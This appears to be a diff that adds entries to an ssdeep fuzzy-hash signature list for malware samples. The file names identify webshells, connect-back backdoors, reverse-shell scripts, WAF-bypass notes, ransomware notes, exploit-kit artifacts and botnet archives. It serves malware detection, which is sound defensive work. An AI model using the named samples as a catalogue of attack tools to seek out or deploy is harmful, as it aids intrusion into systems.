+24:iF04MeXJ9Io2SHG4hqllMrnCkThjiNeI1fMuuojKls6UeWTOFKls6UeWXPrcnb:iF07MT2GGgq8TKeIEGjKls6U3TOFKlsc,"t.gif??"
+24:IeppQeJiMx3XUFOsJAmxuaPH/cnfP+9vlD41qziQZxAenIduM4/HASICv1GDIr83:IepCmBwSmUGW+Vl0y/GenIHwwDIrMwD4,"068c348bade79f688ce22b8ea6e20135_php.txt"
+24:i81AOqxNkpgMgErhR0iAI6kpg6H4WuzOG/f7MzrKtoluzrKZrFzrKTm/1ES19AC:j1APxtUTrAI/pgkuB7Mz+toluz+ZrFzL,"仗剑孤行搜索可读可写目录脚本.php"
+24:i81AOqxNkpgMgErhR0iAI6k76H4WuzOG/f7MzrKtoluzrKZrFzrKTm/1ES19AC:j1APxtUTrAI/7kuB7Mz+toluz+ZrFz+K,"PHP 搜索可读可写目录脚本.php"
+24:I1YyFTGtA91yeNXZactNC8FM5o3/BA+41gxREuy/4QipA/YA4IP:zyOA9rOtovm+4GecnAQA4O,"CmdAsp.asp.php.txt"
+24:i07Ps910YM5sgDwfEaAUfrIUU7qBwAE3sEMR87zA9qHl9JReuINCIuwFVWh9f:ixcyHlrE7qBrRA3AgHbzeuINCIuekrf,"cmd.c"
+24:hYycgSHiSlajeJvJDyzGpxH019FEYvNvZVusgDUmEZ1r2ilHhiomA3ef3EQJZomW:hYyZSHvciyQHEmENRVcUzb7H6om3JXof,"jquery.cookie.min.js"
+24:HYGe2TXfKXp8FM5A0lIG9AZCh3uy/7sMcpPgAN2q:HT2ZtA9G9p3kMcZgAkq,"cmd.asp"
+24:HxWXNM7hHf2cxgSbwUCscaIkWEVRUfyeChWk8Y+G437DXr8QNRV18n:Rmeh6m/QqeChoHG43fIQNnSn,"ReadMe.txt"
+24:HXTXdS3r0yOyj0G5u7N4uSU0A0r9yW9NSFH+9k1cA6Agf5iSyS:HXTXdSeB0u54U0A0sWAFH+98f6JF,"veros.txt"
+24:HXSxXdS3r0yOyj+OjYG5Cs7N4u1GP293SnoBf9cpKkslbdE0ly8:HX0XdSez50554MGP2coAp9qiU,"savedd.swf"
+24:HXrTXdS3r0yOyj0G5y7N4uSU0A0r9yW9NSFH+9k1cA6Z38:HXrTXdSeB0y54U0A0sWAFH+98f6ZM,"vero.txt.2"
+24:HXQXNM7hHmO2cxgSbwUAscaIkWEVRUfyeChWy8Y+G43zXr8QNRV18n:3YehaG/QqeChoHG43zIQNnSn,"ReadMe.txt"
+24:htEDb3o658ZgDtEtLODtbx959F8CGhGj98ztVQzRcxDZJ:htEDrf58GtEtLGtbx9vF8hGwuGJ,"index.php.002"
+24:HrrayMTlZziVrTZYTlZzI78JmuBIx8AP3H4RMF2w3FvBy:LeyuYnQqZP3NF2ctBy,"______________email.php.001"
+24:hMphXC1lBzBiTQUAzk27weYogeNVoIc5U51PJFIkv3PMiKn:6XC1lB4Tl27weYoVcIc5U3PJFIa3kV,"42fe603af1a4944f972e035f7837e0a0_php.txt"
+24:Hm6KEKTXNM7hH2Kr6KH2cxgSbwUxKHscaIkWEVRUfyeChW7Kl8Y+G432KPXr8QNS:ZbOeh2PHYX/QqeChMHHG432gIQNnSn,"ReadMe.txt"
+24:hIwvL6SExjVIzcQsH5MKe1XGMavWNWqy9HQdZdgD6lym:hIQExIcaK6Xo+NWqysdqHm,"ZoRBaCK-connect-backdoor.php"
+24:HhtvbxoQWs1h+LY0HtboXlt278JwLK827PcAw0fkVzPz55f:Pvbl2o1t278uLK827Pdf0zXf,"hotlog.php"
+24:H5P+1TXNM7hHowH2cxgSbwUhHscaIkWEVRUfyeChWLl8Y+G43oPXr8QNRV18n:ZW1rehowSK0/QqeChOCHG43oPIQNnSn,"ReadMe.txt"
+24:H506MXNM7hH7r2cxgSbwUnscaIkWEVRUfyeChW6s8Y+G432Xr8QNRV18n:Z0veh6H/QqeChbHG432IQNnSn,"ReadMe.txt"
+24:h0EYXLyljxroj54fCGzLjW80tVQz39crLto:h0EKLycjm3zLEuN,"Uploading.php"
+24:GuCG5Hz+n1fIFdME7qTrxvplfy0ZXh1GaSqASvRnwGw2Eq:NkfIFdMECJfxFHSOv1wGaq,"404.php"
+24:gu1R4EI8/VihiylC9qdfRGiggEmpelv53H4qcP/NcZTuMZhuBmSOppFP1ZTuMZhl:g3vUViW9gZGiEVjHqNpOpr2i0yhGvutb,"_input__dr.php5"
+24:Gsl0mV2/PeQ6D0aIb1TLwzU/AvGYS4VazNWW1ReZoKfbUoNIkyTZRhSn/aHf9oT/:1l0m6itY1fw1S4iWwRe1bpIJTZzSn/Io,"test.asp.txt"
+24:GsBzZ6NhIz5r/sang8Z9RSlHyCk6lVhbH9STUSQAjXC2wS:1lo/Izl0ag8Z9RSlHAubwTU0XRwS,"Backdoor.ASP.Ace.el-红狼官方专用ASP小马.asp"
+24:gnBVbW55SCq+dh5UrT8dBdqQ8CCjmFPlKFuWjh47lGzlSpggb/gTeu:LY+dhOkdqQRCjEUy7Qp/Teu,"V7xg9ArDTKxB"
+24:GLWycRXM7RSYNUL0qpOeYQxAeMaZT/hrqTrqg8y89Ha6b:6WrBYRSYzEzYQxBhZTprqTrq1Va6b,"php_context.tpl"
+24:fRPgBu7g2dBF/8FM5AOYUSz+wBNzEa03MTIFEI+UkEp9HdRJmv:fou7bhtAO/xw6cTzpUkEjHdRu,"cmd-asp-5.1.asp"
+24:FRKkHRA6jWxrEeUCDI0s7qsy6lRB6sjlanUPYUXV:a8PK+BJ0s7qsfe0lF,"Jsp反弹shell.txt"
+24:FpWwIQwuL27JA94jHFI2Qj6gXm1fqTB/RCEC8:FpPrwuL27B6ihqTB68,"inb.php"
+24:fPL1IaJk7LNLJJ5nAUwBg52z2+/S+be0K:L1IaJk7hLHSUwB+4J/heH,"Download.ps1"
+24:FMPpTctOLK3hU1VUxnEuzjyzTrK+Q586jxf3:KPpTcoLK32VUREuzjeX5I86d3,"published.jpg"
+24:FMoMiaknGEncxIJMm1WGKhgaWonbb51NWguqs7OWf54vvZmTc7/Ti2D/iPH3/e7n:KfiakGacxIySGhgeWnii24c7m8avWn,"Ada-Yang-Inject-obf.php"
+24:FGlCOR1gY9MI43P8NH0xTepRscdyVzr/mM96mjCG2bA:8NnSN3P810x8xdyVzrm8Rj,"0d4ceec2a23a3b356a8ef5e7f8b7b573_php.txt"
+24:Fby3Kz/K4oMyRtqCBguNMv+GCjOLhv+QZCZh0J9dO+cJCwS8kb+5CJTo+QmiCxxI:Fb7o9nBguNGDNYzSuKPRI,"79823478923095478602.php"
+24:fbXyv5WRkGTyqEOjInNvOfOz0GO0upe+ry/y13AOtOrj+IWMtM03T:ztaGeqMN90iqPW/u3vILekT,"redirect1.php"
+24:FBBEPO47s951SiP9jk1w+zq+p2TXwY6o5utZUNNw4SLMGiW586n:mG4KzP9Y1w+p2jN6o5u8j+jiW586n,"hotlog3.php"
+24:F6KDjDWy2DSDTDLDLDG+Di6DaDeD6DCD7TLDLDPD6DXD7DrDl:g,"2016-07-06-CryptXXX-decrypt-instructions.BMP"
+24:F6KDjDWy2DSDTDLDLDG+Di6DaDeD6DCD7TLDLDPD6DnD7DrDt:Y,"2016-07-07-EITest-CryptXXX-decrypt-instructions.BMP"
+24:F6KDjDWy2DSDTDLDLDG+Di6DaDeD6DCD7TLDLDPD6DCD7DrDl:L,"2016-07-12-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+24:ex27wlAFiB27wMITShrtBMR19rBMJ7ULJH5MgJ6m0LQ+3MFWvbDDBM:ex27wN27wMITEmueqS6mZ+3MFobDDa,"enviado-sysinfo-snatcher-mail.php"
+24:EwPVVJd00Yr+QcHs/wxTQyazOpIafa2nsak1q7eB1qRA4MvsBho/D+fJ3Hh:EwdVJdQr+Qas/wxTuzOpDa20wCQjMvsj,"2017-03-07-Sundown-EK-artifact-mxl3sfDs.tmp.txt"
+24:/euI87Z8RPZmD+bIVWPNqxiWU2W+QTLTYq8Cv:/b9DGIQ0vmLTl8U,"Nishang_logo_small.png"
+24:eTwpaed5dwRwanw/m/OLMUHOXNdUHmDUp864d+ywndbUJgElJdbG46tFOV4hQ26L:m25D2u4m2VlV9PkkiktNeEgcyE,"testm.phps"
+24:ek+2p/6zgoivzi/27JAPZiQ5DIlcd26zMXm4VQjix3YnZb9SA6AMM:H+sSU7+27jQNMy1JDEYnZYA6Av,"Rfiemail.txt.2.001"
+24:eHymZRZQGWBVVesVIHn45DFkMwf/JGn8wf/:Sym7ZQBB7eGIH45ZkMwZGn8wn,"CmdServlet.java"
+24:e8hhSc04Z9vafXuVjVkJFVhkZc3yZHUZHrNmn6afWZYioXngz7qrwDJ:nhShECXajasS3oH6HrNHqiS6,"VirusShare_d9bcd7f59ce74f23d5d149b4d18e5705"
+24:E5yaznd+wxYdoJiye4QWOVX/Xy5wdDXSllT5xuHN3xHZyIdFoT5ed+3ZdMyVsWUP:ENz0weFyNaV65Ym7uL3yCW0vv4hW0vv8,"returntosender.nl.js"
+24:Cz6ui4MqyY4WvWnJ6//u1/JYFyZiyqSFFibH3Nh/5DA3qQXKHZslARJNbJb:Cz6ZLnCp/m/Px+fxDGIsoFR,"zbi3.php"
+24:Cz6ui4MqyY4WvWnJ6O/cJaGjaI/fiU7dXbEbH3Nh/5DArVqQXKHZsIARJNYHb:Cz6ZLnCQ0Lnh4fxDMVIshG,"zbi_2.php"
+24:Cz6ui4MqyY4WvWnJ6EzmbH3Nh/5DAPqQXKHZspARJNTHb:Cz6ZLnC+ufxDUIs85,"zbi_1.php"
+24:CwCaGHbe6GZvVaeOOzkTAIboNU4oXJsFMu+xOp:vGHbebZU4zkTAI0NU4kKF8xOp,"DemoDLL.h"
+24:CqM4ntwhDB6+fpIDQpBKMHjjv5Wceq4TgyN3HitgMiyG:9MjhFfe0zbjv51eq48ydiZiyG,"Welcome To AK Team.asp"
+24:CqM4ntwhDB6+fpIDQpBKMHjjv5Wceq4TgyN3HitgMip:9MjhFfe0zbjv51eq48ydiZip,"shell.asp"
+24:CMErj1x9CpWNI34WLZl3mlU0XIJ+6CV5RTaz6/5V+eL26sGeJGI3jkMGR8PNx25w:cMgI4Wll260LvRWWhV92tGTIIMyEi5LM,"config.php"
+24:CKJuKVgXJfKVujJmjJ1KVoJaXJcjJYjsntXsJj1jWhHXvjPjm:CKkKSXRKaqXKOcXIgsntXstBWhHXrLm,"N8.jpg??"
+24:Bz5yYayVzz524ooz5hRPZkVslniKqaQ4tnpCjHFbRVo0VnMNdIzpnMmXAIzpCNII:BzIytzw4oozB08pebRVhnMNdIz5zQIzs,"liz0zim.txt"
+24:Bz5yYayVzz524ooz5hRPZkVslniKqaQ4tnpCjHFbRVo0VnMNdIzpnMmXAIzpCNIc:BzIytzw4oozB08pebRVhnMNdIz5zQIzQ,"Liz0ziM Private Safe Mode.txt"
+24:Bz+1MTRidinn3zPI5PDg0lLoFp3/6WUYtAK0HWheJHnZDb97Mg8OvAHebb:BzGldi37IhLsp3CP5K0EkZDxIdfH0,"processes.js"
+24:bXKM9CQoowjAUeAzGGn8N+ndDqkKgx7KYR93L3ODYAAi0mQszV1RmO+WOY9A:2woowUUjqGnB+kKy7KybeD2ip93VA,"lurm_safemod_on.cgi.pl"
+24:bTyLvmJf7FC9+HOb0cRcLR8qZkRCorRXLCCVpCPoK:PqmfyELzodnCwK,"404super.php"
+24:btgCAusBNl6GW1GNyAk5sxYnoiKZzpXtW8R9oqrHPps/o:bti59WoYzmhVDPR,"pHpINJ.txt"
+24:/bssvnfqjiN4xZlNMPSCQKQv97bpntyx9rU9K/0FWvAMmTJBMBI:/bsOuioZlwSCQKQv97k69vFoAMmTJBMa,"Osirys-response.php"
+24:BRdUaw2m02dK2KnonZVwxt9xtoi2inZVy0wCxt5PxtEi2inZVyUwCxt5Pxt2K1nz:B0awd8ty22Wd+2WWd1Cdcqs3,"hijhack.php"
+24:AZwndbUJgElJdb3Sf46oNB3V4hL1O+gli+U+4YrxSz+ff0h2IfwaReDqDGDb5Lb5:p2Prj3Vbk+qY8Vf1eDE6hIhUv,"f578a4054e2c356cb51a4ba705e1b9c8_php.txt"
+24:AYVTAOdQTG4obiAm239WsoXN3VCkvUArT5zMS+3YP/rmP3pFWxN8IFHBn16:ACTeouQ3zo93V1cAraAiP3q8ChA,"cmdpassthru-obf.php"
+24:AyT+NqCMppsEPLnnxia2jxpm+lhlfFfMmwxmNUmBf2tOg78iybMnaOi:icpKincBxpmcnFaxmqmBf2VFi,"fooness.php"
+24:awXuPghERgzlHBvGUvAZ0Gv0nbpd/y6MGf5rQ5+NQaE+3JY/8GN2Ub:awXrCMLZYz0nbHOGfJQ5+NHEk28GN2Ub,"config.py"
+24:AnaXEgfTeMCH8aTeQaTLAlVr8ht5j21oSjTyf4FUKTFhZ8zJ+T:AaXxa0Tgr8ijef4uKLX,"sys3.jsp"
+24:Ale6Zmj2d3lepLleO1OOZmj2wcOOZmj2OnleILlexOZmj2gaJle6Zmj2t3leJLlR:ae6Yj27eLeO1OOYj2wcOOYj24eqe0YjJ,"8c975e0f2d78cebdb8ecff3dc180b316_php.txt"
+24:Ale6Zmj2d3lepLleO1OOZmj2wcOOZmj2OnleILlexOZmj2gaJle6Zmj2t3leJLlJ:ae6Yj27eLeO1OOYj2wcOOYj24eqe0Yjx,"60b7a21748efdcf12581531fb35408aa_php.txt"
+24:Aj4K3NGDZ+DJS9WJ6JSWyFZfJZEZ3SUWiQt6VyIl:Aj4mNj95J6JSWyFFJ6VSUWiQtil,"as.ashx"
+24:ACFchTWGTXthTVTeQmmrE1ItW2TIgCQ6tMUTW2z02fjpLa5oBMUThHqCt2Ydq4RD:AbBgQmbQfkRNWQMQHqCtldrRAJY2r0j,"guige02.jsp"
+24:ab7vmN1rzmL+/nrfAu5nLKLTp2kCnT2NgnRnD8f6KC210ca/bf6KC2H0PX2LAcQB:abiN1+LlaLKLN0BRIS3tca/bS3BPhQ87,"Base64ToString.ps1"
+24:9/ZT2aGOmc5ViePqqUtX7mwepHkioSCyJnmvmVe/Y4g9YYklHH9Po4jM6C3Guucq:9/MatllPTUZ7yqioSCIkmsfgZoH9PlMg,"zipper.php.zip"
+24:9VwzoDHbu1yfbFJuJ6dz78eAXsQNZVT/U6IRc32syOymX77jUsEMvElGDCCrV551:YMDFDFJuJQvQFZVT/UPKVyKX7XUpcf71,"languages.txt"
+24:9UvKE/nAJt4pCyk13yLoGvagRedvvb7ViHx+M8/UTpSm3A2:9a/Awox32oeKvTHr/2Sn2,"20160131-051657-Vq0MKWjuZ1YAADSYDHQAAAAD-file-0s7rEt.1454181417_1"
+24:9TwjVh40LpCzy1Zp7EqSjBGv3MwHUkadLBPCTwJMFTX1dXFC6t:9TwjD4uoQpIq8BwMwHLaRBPbyj/C6t,"20160202-034942-Vq@atWjuZ1YAAFubecQAAAAE-file-zaRLKb.1454348982_1"
+24:9siwjVh40LpCzy1Zp7EqSjBGv3MwHUkadLBPCTwJMFTX1BXkxaCql:9siwjD4uoQpIq8BwMwHLaRBPbyj+QCql,"20160207-161141-VrbgHWjuZ1YAAEU2eVwAAAAB-file-UtjZFL.1454825502_1"
+24:9iGtNqxOCYTxygaXKDMu/1gexHBaPxTXS:99t4gygpDMOzHBaPxjS,"zs.war"
+24:9GPTbBw/3Kq4Fq+hDCnP+mo2INhl4hTuh2KCioW/gv1jNK69kKqQHPrhPqohpSeC:kbbBw/3KzFq+NaxovNhl48h2lioxv1JM,"7.php"
+24:9AGt/qeOC6qG3fAoUZeNl9QI9L8KAAFY1Jth3qDxIIpExaNl66F:9PtyJgENl9dhkL1J8xIIKxaNl1F,"cmd.war"
+24:93M346uSzWAys2FEpMpn6+YvKsLKPXVwuHEHS1ed2QXVWR/vdVR1VBaB4:93Q46zzWAysO0M5XW031qXK3jV4e,"VirusShare_2377972bf889a3a806c5e85ea2b35279"
+24:8YWegOJgxFRZQYSDee7VIqn7KVDVNMzNfPbcVkj4:8Yu/ZQYSaehIc7KVBNMzNfPb0kj4,"CmdServlet.java"
+24:8/yRwFVwEPasg96IFd6FqFXTFjuFF7FIkbf7eKPfjBFEMqisBFfQhIwXuQLbAHxP:8que96IX6YlYF1rbf7eKnjBF7qJixlQF,"cmd-v1.3.aspx"
+24:8UhIlfdfA7Ki8Mq6LiQDv1ZqJafBbqBRdF3He13MYuEeL28jAYflVhYIILkJ1yL:ZhIwhq6LiQD1eafBb4fHiMY188YlXIe+,"cec1dec9f84c8c8bd76b8791a93a93da_php.txt"
+24:8R+MoAKxfJ2QcgxyVrXRlAt1KpWSLNO/OTPhMHBcVX+Ey8EhhFMXbzrwlIdfqsLL:8RBCf4kyVbRO2pW0QqVZ68OzMeIdfqGp,"46.jpg.001"
+24:8PfqEJd00Yr+QcHs/wxTQyazOpIaJa2nsaoeazvBWHMVfJXwO4:8FJdQr+Qas/wxTuzOpVa24lzvBWH6Nw3,"2017-03-09-Rig-EK-artifact-o32.tmp.txt"
+24:8PfqEJd00Yr+QcHs/wxTQyazOpIafa2nsaoeaTvBWHMVfJq4wO4:8FJdQr+Qas/wxTuzOpDa24lTvBWH6Hw3,"2017-02-28-Rig-EK-artifact-o32.tmp.txt"
+24:8PfqEJd00Yr+QcHs/wxTQyazOpIafa2nsaFeaTvBWHMVfJq4wO4:8FJdQr+Qas/wxTuzOpDa21lTvBWH6Hw3,"2017-02-26-pseudoDarkleech-Rig-EK-artifact-o32.tmp.txt"
+24:8jYjB3QZYm1x/ZtcSAiMKZdq/uZJobaLy3s4QC:YYV3GYm1l8iMK3Lsf9,"PowerSploit.psd1"
+24:8hxNkuCGhGjm8TGTVzWpW2JpNrJ9Pva9X+tIc9SN:GxNkyhGkTNu5jTtvAN,"unta.txt.1"
+24:8CGJhc7GyHk6JVjAkCOAqBXd+NMvycxCUgiCM5CXPhppGDYnc5Nwl8CfDlw4GJZo:8CGgjHk6JmPgy5uC8DhwdfDlw5Zja3aU,"bootstrap4.java"
+24:8aPV8Skj/Teh8HjGSDojyvh8AK6GfQdCgkgS0cW/v:bjkeeHjTDwyveAbfdpI0c0,"cfexec.cfm"
+24:8Aev7SjPVuWyiHPB2vVJlT8oWxaslzn2cd3eQjqw5l3Ei+PB2neeT8nWuilzn2cw:8VT4FqloQmhd3em5l3Vo/ohw,"DemoDLL.cpp"
+24:7TIocdXvgN8kTk/VG0i1FBxYtestD7H5nPsoeGVyBEktFJIzE9lRRRwiSO6KHqn1:6dXQ8gx5st3qoZgGE9lWiHmh5t,"菊花聊天室.php"
+24:7r8/B4S/ibJGmd3rA6yurTyrMBQL4U+TCbsv93NbFCbMSbM:7rJr3r/BrTyrMo+TCbsvJNbFCbJbM,"php_bzip2.tpl"
+24:7q3ICmNi6wta34W5Aul6h5Y+2Ak9Jv6NtvGnehTCFitbAbkpwl:7q3I3NdE8Xl6LY+28tvGsT0wokpwl,"Backdoor.ASP.Ace.a.asp"
+24:7nL78yJn4JL68scgL67xvskG3tXm5mxvW8scgITZ6aG5aHks459VFds3ZRr2lkEC:7nLdJ4JL6B4xEkso5mxGGl6aGuOsJNfJ,"2016-07-25-boleto-malspam.eml"
+24:7ii2k0kUgGpUO/P4D81K3KIHN/+F5OveeeXyQotH50wv3CSHa5v4OUzQac:2kmNU8P4D8Aam8FgerXyF6wvy35v4OOA,"20160202-114336-VrAJyGjuZ1YAAHyjmKUAAAAT-file-8OLB8J.1454377417_1"
+24:7Gv2XkG9fA/prEPg6EFo+f1MP+0fA/WfudzA/Xv6oA/XmYOK+V+yXkfA/tquzA/V:762Xn+Bwo6EFo+mP+VAX6FnO/QQALP1,"short_shell.md"
+24:74gPJW/KrXZfEhuUZxNRd89RbLEazx+RaBblF/B3xOgWL:HRW/yfEhuUZx5KNEaF+RaBbfCge,"ownsafety.org.js"
+24:70p4NwxxUJ+wAiwVDc+gyvA+hHTfi3X1T:7xEyJ+wYDc+gyvA+pO3V,"palen2.php"
+24:65j3SkeEedNBT9L86mmT9EgTULNg7A9uCaM9DIRK8nI4cpmyQhQyCWD5:69QRPVmgEVBMQuCaMOsXpmRr,"asd.jsp"
+24:5vjejSR2cyAOkHjlaTbVNcB+zf+/JfCEVKdAgi9yJVPsjiRvaUB:tjeuRJysHjMcGf+/J6I4W9yLda0,"dirs3arch.py"
+24:5tJNM7hHjJ2cxgSbwUjJscaIkWEVRUfyeChWl98Y+G43jyXr8QNRV18n:5tJehY//QqeChNHG43jyIQNnSn,"ReadMe.txt"
+24:5sDtFnKY/4hL+ZwntaKTaYM+VKufQs1TBQzQOG9VlWod:qRFnKvhBtaKTaP+EulBI5G9WS,"filesd.php"
+24:5sDtFnKY/4hL+K1DguEGNmGJX6SV+v2iPlzuVY3+ehFdn:qRFnKvhJMemGJtQ2iPlmW+sFl,"filesa.php"
+24:5eKoMNmMvwVECI+XtEy7LnIYxu7H345MrMZxP8s9Ns3h94YMp45i7ladLgR8IcV8:PmM4OC1AY8L45/xPhmf4PpyQlEyz3CDm,"sql_client.aspx.txt"
+24:59VlXZb7ZaGMFRqyU8GmF4irA/rdcrePfQTCkojr4tG8c8OR:5DHhhrbfQfowkNR,"2016-03-24-Locky-_HELP_instructions.txt"
+24576:YzNmIO1NYgoL8j9Or4BljnEphGGjmhoO6fEYy5YTRiV9FVqkJN65R:wbODYgoGiWlIphGGjmaE3fFvJ85R,"axis2 利用小工具cat.pdf"
+24576:wO2WmZTqz8w3VCSOllassgrzV+SPQg6NfNaJe2yXtLZxrd3sZAkfMpbrzq0Rxg/6:wSCSc1rzMSTJkXtGO1fq0Rxg/pO,"System.Management.Automation.dll"
+24576:v4uHQy2lYkTm0XFmljFug/D9mFTIBElaYDm/rGj:AuHFcTxa5zRZYDX,"RABBIT-PC.zip"
+24576:tIIYMyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyym:,"2016-06-01-lluuitgg.exe"
+24576:pVrQxAhfPJR2oPOAkYllUI7TYbOcNdD/cclvnN5HtmcnQm6SQnG4:ACB72iUIAiyZ3w/SQnG4,"8afc49b02429a"
+24576:OBz6beUsnPRTyXsWyseFxvGW9G70ctGOSekcOiR+1Co67:OBmeXnP089fvGW+1ycjidY,"ZunkerBot1.4.5_Sep2007.zip"
+24576:NleH3uBsT+4BFNw/R9vIBEZ5l2ZttnbX/Cy:WX4C+UF6LQe52ZjbX/Cy,"Rustock.zip"
+24576:MamTaijubZk/skc3oYas1/mjYhgxH28EMQoB7aDtvUeTQcVq23:MFGc+X4Yas16Y6xH26JpalUzc423,"framer.zip"
+24576:lVrQxAhfPJR2oPOAkYllUI7TYbOcNdD/cclvnN5HtmcnQm6SQnGR:cCB72iUIAiyZ3w/SQnGR,"2016-04-22-file-in-same-directory-as-click-fraud-DLL-8afc49b02429a"
+24576:lVN5doutWcDTFtClE7MMy40LuaFF9TWbhgpHydHWXc7ocdcebx52YBBRUCK4:lrtwStClEwE0LXNTWypLc7oob/2Y/UCB,"DopeBotv0.22_CrippledFeb2007.zip"
+24576:LBv2bFLOd6Be55RuopVmmoPFKS2QLDtkKXRXh4i88+Ts:Z2lFeUQo9BLNX1D+s,"VADER-PC.zip"
+24576:JYL9ASXX4mi72Bw/zK5WKLjJYHrXW4oGT0CDtGwN72NOV7RjOC7yPddopDrZ7tvZ:Uf4mi7fekKXnGTvN7007zadduDt7+k,"Trojan.NSIS.Win32.zip"
+24576:InfaRCSAL0y87d7wBiluBa5uiFbBU5TVz1tV2rYU:YoYVz1tVxU,"07fee20e0e24fba5da5aa2193a93a5c6_php.txt"
+24576:HOkIKRqqyBWhqbiF8yn1QtOsETM5nIJ+Ak:zyBWOiDnCtOlIIJQ,"bot.tgz"
+24576:dW3zCtANmNwnbXaZY0WCgy2qu7RBdFwuUjzUhJ5SWWi0:dwuAQNwbXa6F+ruNBdFEgH5Sz3,"GO-GO-GADGET-PC.zip"
+24576:clrCdshl/AwXmUWVOBkvhBi37eAXGCUX7WeNywuDPxf:cu4dHXmjVkYhBuJULWdwuDPV,"SPRINGFIELD-PC.zip"
+24576:CIOsfkiGTo5MD20rnHsZUH5pv7alzbCIgcGA1EsQxsnZ+G07FXhUyRSoMk4JlNw+:CXs5t8FPkbCIgcGA14Qw7pxLWNSzd8,"anope-1.8.7.tar.gz"
+24576:C2vT4f3r4lgk8Z/vRT2ZgHZ/qTpNZ70f2NYW1omV159t:C4T4f3rGxa2xp4Lw159t,"SCOOBYDOO-PC.zip"
+24576:9RKVOCkEsCmIO8JSjeZvD0JitFYtBXDx3ly4BWGKd3DmOeek1:9YVOCTbmIhSjedD0wFYvll31Kd3DmOeZ,"2016-06-26-Cerber-decryption-instructions.bmp"
+24576:9nicgDSvEx2gZujo7g51qNe2UfZ8RcTYxWnasWuNEcqJEWyhxt1JmTY:9/ux2xjoq1lHyRPAX9eEWyp1JEY,"DopeBotv0.22_UnCrippled_Feb2007.zip"
+24576:72O/Gl2XdX6dBRQNab75fjvspq+j2/6fTH5AX7gh8/pIHYs0WAXa6pRkwFIo4KV6:vdX6LRgijx+jnmW8/p8YsbSbIoRBi,"jtck7p3"
+24576:4vRE7caCfKGPqVEDNLFxKsfayI+gIGYuuCol7r:4vREKfPqVE5jKsfayRHGVo7r,"wmiprvse"
+24576:4BBL85RHxJhidpFQrAuNYUrICnKaSqwGG1WsWKD7Vb:4BcxJtrArU8CnrS7GG1WsWKD7t,"directory-list-2.3-small.txt"
+24576:1s2/JEjVqP92TL95KyyGsREal4cIUUODo:q2/JHqOyyhmaicf9,"st5786543.scr"
+24:4lR15VhvxV1AJvgfMvQ/O3VfDBdFJcjFw1Bfg7fuw59Hq:gbhvxV1AjseVfDPFyjUtGPq,"sctp_reverse.py.txt"
+24:46ShpA3NkPBsoU7rpOZQbV9K9WU7XP/lc537sxAqM4YyK0Rp9+kxAotoLfA/nf/F:4rh0aPBsoU7rgmbVnUjP/goxAq3fokxl,"bypass_waf.txt"
+24:3vUNGd0137RQHLKF9sTtRdAgoei/pXBW8wrq92o2r5RcVHKKFMhKjOAm2h5:3vs137Rybhi/pXurq92oAkVHbjOAm27,"__init__.py"
+24:3Ugr+B8aOp6eCN/6CXdLStjFNXqJJsvios:LrYOp46M+XVvif,"load.php"
+24:3UgKyZRWrLWt7+hDqr88Tqtyhml9x7UKDBq9CgZos:Lti87+1qw9OgDKff,"flow.php??"
+24:3UgIroeIkSy6yg0PwbuZagA03lZjUDbHV25J92Doyqx94vos:LNDkSy6WIbu1AolZIDbk92+x94vf,"load2.txt"
+24:3ol/UlWKRhj5nodBodjd3LA6knFgcG7uGNop:Y8hFuB6hM6YFlq5E,"kun.php"
+24:3ol/Lp7oI3vYob8+okh2hf5sWiShgTdj+Eop:Yrnb5hwTsPShgpTE,"load.txt"
+24:3ol/Hs5r6Ulg+EaEkYcCZegpz7lRn3YRH35pgiop:Yq5rU+EeVCZeizn3YRXjrE,"kan.php??"
+24:3I7+cvpf3AU3bcbM0pX4cNWGTMzg1o9wuD:3zqd3BKBD10t,"2016-04-18-injected-EITest-script-in-page-from-compromised-site.txt"
+24:3cWSWc3ZJQBjFoAq9C0P9op7krh6CbmY9qomhmO:MWSWKZzc0P9opHphmO,"cok.php"
+24:3AeXdUG1LeXqbE1w4tpHXjvpkXNFW1ExAXqLpzBXgj3MDFNlf9zhLJ:3Ayq9w4ttTEOXqLjgbM9f9lLJ,"Backdoor.ASP.FileUpload.asp"
+24:39MoNUAERk636j3E1NE+dZjnkcizs+YRfxpuYYr3enpsJk1SPPPnUFV2:ycRx3EHdRkns+iEzraEPPUFV2,"cok.php.2"
+24:39MoMiT5TAXg3L4gGwZLZFPTGxeGpOsO3S7Gi8FOSei5X6vfSWqXXBMrEGNOriKt:yfiT5T8gCkFPAj7Oy8FOdCXXByJNEiAj,"mailer-simple_webshell-logx-obf.php"
+24:39MoMiT5TAXg3L4gGwZLZFPTGxeGpOsO3S7Gi8FOSei5X6vfSWqXXBMrEGNOriKd:yfiT5T8gCkFPAj7Oy8FOdCXXByJNEiAT,"cok.php.1"
+24:31201TWX9E11ITeFXU0tF+8FM5I35Aug1gxREuy/4wiS9p4A4Qy:k0z1eA+tIeugGecw92A4D,"cmd_by_Maceo.asp.txt"
+24:2ssWftA74kvZqrSRQvEF3v96itP/omWN7ABMuOT:2s/AHZMSRQvEZ+mc7ABMuOT,"idosyris.txt"
+24:2ssWftA74kvZqrSRQvEF3v96itP/79mWN7ABMuOa:2s/AHZMSRQvEZzmc7ABMuOa,"id.txt???"
+24:2+QzD4bfn3+S2Y64LapyFtf9ETIW31WQsFjqT9n:2+GD4tLfPeFWQVJn,"mod_caucho.shell.htaccess"
+24:2oPEIZXvE7vEIQgyaEOks1tfzPvl75rBm1QKMtwYwWFRMFWv:X8I9scIQgyagWbPvl5rBMQdeFWv,"dllmain.cpp"
+24:2oPEIZXvE7vEIQgyaEOks1tfzE7S1qvqxHuBvEDbHp+chKZ8LFmI1HhX5B31P/0p:X8I9scIQgyagWba65HNKAFDdB5J9s,"NTFSParser.cpp"
+24:2+IhzefxVLJmZd54oax0tZtMREBBAhHrQyH9S:Cze/dmZ4Zx0t/MuAVEydS,"ab1ca131e7fac0b58b75820896d21e5e_php.txt"
+24:2GReujPmpbPRERsoLGRib8pLGRiwBeGn0RTn0RKje+eW:55jPmpbP6nC48pCFBL0t0Gh,"Server-Variables-simple.asp"
+24:2egVunyAyBmixsfs0A/WfHqch0UMsezMFD7T/E5hTqF1hJb:2eg0G/KahaMdzSDfMbTYfJb,"Aspx一句话木马小集.aspx"
+24:24z54oMmRt2L1uav+YHHtweVMsv+YUHEzb1DJNsc+PHBWSJF+YRHX4y+YaHiMvvw:2Foa1uEhVQkhz2ESdMHYv9,"_input_3_css.php5"
